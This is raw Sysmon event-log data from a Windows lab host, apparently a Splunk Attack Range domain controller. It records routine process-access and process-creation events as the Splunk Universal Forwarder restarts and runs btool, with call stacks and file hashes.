12:02:52.901{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008059Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.901{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008058Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.901{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64EC-6064-CE00-00000000AE01}3104C:\Program 
Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008057Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.901{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008056Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:52.901{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008055Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.901{266CAFBE-64EC-6064-CD00-00000000AE01}63805716C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{266CAFBE-64EC-6064-CE00-00000000AE01}3104C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008054Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.914{266CAFBE-64EC-6064-CE00-00000000AE01}3104C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk 
ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list httpServer --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-64EC-6064-CD00-00000000AE01}6380C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list httpServer --no-log 10341000x80000000000000008053Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.901{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64EC-6064-CD00-00000000AE01}6380C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008052Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.901{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000008051Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.901{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008050Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.901{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008049Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:52.901{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-64EC-6064-CD00-00000000AE01}6380C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008048Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.901{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008047Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.901{266CAFBE-64EC-6064-CC00-00000000AE01}61966560C:\Windows\system32\cmd.exe{266CAFBE-64EC-6064-CD00-00000000AE01}6380C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
154100x80000000000000008046Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.907{266CAFBE-64EC-6064-CD00-00000000AE01}6380C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list httpServer --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{266CAFBE-64EC-6064-CC00-00000000AE01}6196C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list httpServer --no-log 10341000x80000000000000008045Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.901{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64EC-6064-CC00-00000000AE01}6196C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008044Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:52.901{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008043Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.901{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008042Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:52.901{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008041Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.901{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008040Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:52.901{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64EC-6064-CC00-00000000AE01}6196C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008039Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.886{266CAFBE-64E9-6064-C000-00000000AE01}67366740C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{266CAFBE-64EC-6064-CC00-00000000AE01}6196C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+6665|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+17249|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+137ff|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+12176|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+19082|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+d94e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008038Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.901{266CAFBE-64EC-6064-CC00-00000000AE01}6196C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list httpServer --no-logC:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64E9-6064-C000-00000000AE01}6736C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2796 10341000x80000000000000008037Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.886{266CAFBE-64E9-6064-C000-00000000AE01}67366740C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+457e6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+460cb|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+453d6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+d925|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008122Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:53.790{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008121Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.790{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008120Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:53.790{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008119Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.790{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008118Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.790{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program 
